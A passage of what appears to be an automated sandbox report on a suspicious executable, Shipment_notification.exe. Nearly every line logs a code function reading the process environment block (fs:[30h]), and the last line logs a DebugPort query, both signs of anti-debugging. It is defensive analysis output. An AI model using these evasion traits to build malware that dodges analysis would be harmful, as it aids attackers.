          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEC962 mov eax, dword ptr fs:[00000030h]2_2_01AEC962
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h]2_2_01AEB171
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h]2_2_01AEB171
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h]2_2_01B0B944
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h]2_2_01B0B944
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov ecx, dword ptr fs:[00000030h]2_2_01B1F0BF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h]2_2_01B1F0BF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h]2_2_01B1F0BF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h]2_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B290AF mov eax, dword ptr fs:[00000030h]2_2_01B290AF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9080 mov eax, dword ptr fs:[00000030h]2_2_01AE9080
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h]2_2_01B63884
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h]2_2_01B63884
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE58EC mov eax, dword ptr fs:[00000030h]2_2_01AE58EC
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov ecx, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]2_2_01B7B8D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]2_2_01AFB02A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]2_2_01AFB02A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]2_2_01AFB02A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]2_2_01AFB02A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]2_2_01B1002D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]2_2_01B1002D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]2_2_01B1002D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]2_2_01B1002D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]2_2_01B1002D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]2_2_01B67016
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]2_2_01B67016
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]2_2_01B67016
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h]2_2_01BB4015
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h]2_2_01BB4015
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA2073 mov eax, dword ptr fs:[00000030h]2_2_01BA2073
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1074 mov eax, dword ptr fs:[00000030h]2_2_01BB1074
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h]2_2_01B00050
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h]2_2_01B00050
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]2_2_01B14BAD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]2_2_01B14BAD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]2_2_01B14BAD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 mov eax, dword ptr fs:[00000030h]2_2_01BB5BA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h]2_2_01AF1B8F
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h]2_2_01AF1B8F
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1B390 mov eax, dword ptr fs:[00000030h]2_2_01B1B390
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12397 mov eax, dword ptr fs:[00000030h]2_2_01B12397
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA138A mov eax, dword ptr fs:[00000030h]2_2_01BA138A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9D380 mov ecx, dword ptr fs:[00000030h]2_2_01B9D380
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]2_2_01B103E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0DBE9 mov eax, dword ptr fs:[00000030h]2_2_01B0DBE9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h]2_2_01B653CA
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h]2_2_01B653CA
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA131B mov eax, dword ptr fs:[00000030h]2_2_01BA131B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h]2_2_01B13B7A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h]2_2_01B13B7A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEDB60 mov ecx, dword ptr fs:[00000030h]2_2_01AEDB60
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8B58 mov eax, dword ptr fs:[00000030h]2_2_01BB8B58
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEDB40 mov eax, dword ptr fs:[00000030h]2_2_01AEDB40
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEF358 mov eax, dword ptr fs:[00000030h]2_2_01AEF358
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FAB0 mov eax, dword ptr fs:[00000030h]2_2_01B1FAB0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]2_2_01AE52A5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]2_2_01AE52A5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]2_2_01AE52A5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]2_2_01AE52A5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]2_2_01AE52A5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h]2_2_01AFAAB0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h]2_2_01AFAAB0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h]2_2_01B1D294
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h]2_2_01B1D294
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12AE4 mov eax, dword ptr fs:[00000030h]2_2_01B12AE4
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12ACB mov eax, dword ptr fs:[00000030h]2_2_01B12ACB
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h]2_2_01B24A2C
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h]2_2_01B24A2C
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF8A0A mov eax, dword ptr fs:[00000030h]2_2_01AF8A0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B03A1C mov eax, dword ptr fs:[00000030h]2_2_01B03A1C
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h]2_2_01AEAA16
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h]2_2_01AEAA16
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]2_2_01AE5210
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov ecx, dword ptr fs:[00000030h]2_2_01AE5210
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]2_2_01AE5210
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]2_2_01AE5210
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2927A mov eax, dword ptr fs:[00000030h]2_2_01B2927A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h]2_2_01B9B260
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h]2_2_01B9B260
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8A62 mov eax, dword ptr fs:[00000030h]2_2_01BB8A62
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B74257 mov eax, dword ptr fs:[00000030h]2_2_01B74257
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]2_2_01AE9240
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]2_2_01AE9240
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]2_2_01AE9240
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]2_2_01AE9240
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]2_2_01B11DB5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]2_2_01B11DB5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]2_2_01B11DB5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B135A1 mov eax, dword ptr fs:[00000030h]2_2_01B135A1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h]2_2_01BB05AC
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h]2_2_01BB05AC
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]2_2_01AE2D8A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]2_2_01AE2D8A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]2_2_01AE2D8A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]2_2_01AE2D8A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]2_2_01AE2D8A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h]2_2_01B1FD9B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h]2_2_01B1FD9B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]2_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]2_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]2_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]2_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B98DF1 mov eax, dword ptr fs:[00000030h]2_2_01B98DF1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h]2_2_01AFD5E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h]2_2_01AFD5E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov ecx, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]2_2_01B66DC9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B6A537 mov eax, dword ptr fs:[00000030h]2_2_01B6A537
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]2_2_01B14D3B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]2_2_01B14D3B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]2_2_01B14D3B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8D34 mov eax, dword ptr fs:[00000030h]2_2_01BB8D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAD30 mov eax, dword ptr fs:[00000030h]2_2_01AEAD30
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]2_2_01B0C577
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]2_2_01B0C577
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B07D50 mov eax, dword ptr fs:[00000030h]2_2_01B07D50
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B23D43 mov eax, dword ptr fs:[00000030h]2_2_01B23D43
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63540 mov eax, dword ptr fs:[00000030h]2_2_01B63540
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF849B mov eax, dword ptr fs:[00000030h]2_2_01AF849B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA14FB mov eax, dword ptr fs:[00000030h]2_2_01BA14FB
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8CD6 mov eax, dword ptr fs:[00000030h]2_2_01BB8CD6
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1BC2C mov eax, dword ptr fs:[00000030h]2_2_01B1BC2C
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0746D mov eax, dword ptr fs:[00000030h]2_2_01B0746D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]2_2_01B7C450
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]2_2_01B7C450
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A44B mov eax, dword ptr fs:[00000030h]2_2_01B1A44B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF8794 mov eax, dword ptr fs:[00000030h]2_2_01AF8794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B237F5 mov eax, dword ptr fs:[00000030h]2_2_01B237F5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]2_2_01AE4F2E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]2_2_01AE4F2E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1E730 mov eax, dword ptr fs:[00000030h]2_2_01B1E730
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0F716 mov eax, dword ptr fs:[00000030h]2_2_01B0F716
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]2_2_01B7FF10
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]2_2_01B7FF10
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]2_2_01BB070D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]2_2_01BB070D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]2_2_01B1A70E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]2_2_01B1A70E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFFF60 mov eax, dword ptr fs:[00000030h]2_2_01AFFF60
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8F6A mov eax, dword ptr fs:[00000030h]2_2_01BB8F6A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFEF40 mov eax, dword ptr fs:[00000030h]2_2_01AFEF40
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B646A7 mov eax, dword ptr fs:[00000030h]2_2_01B646A7
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FE87 mov eax, dword ptr fs:[00000030h]2_2_01B7FE87
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF76E2 mov eax, dword ptr fs:[00000030h]2_2_01AF76E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h]2_2_01B116E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess queried: DebugPortJump to behavior
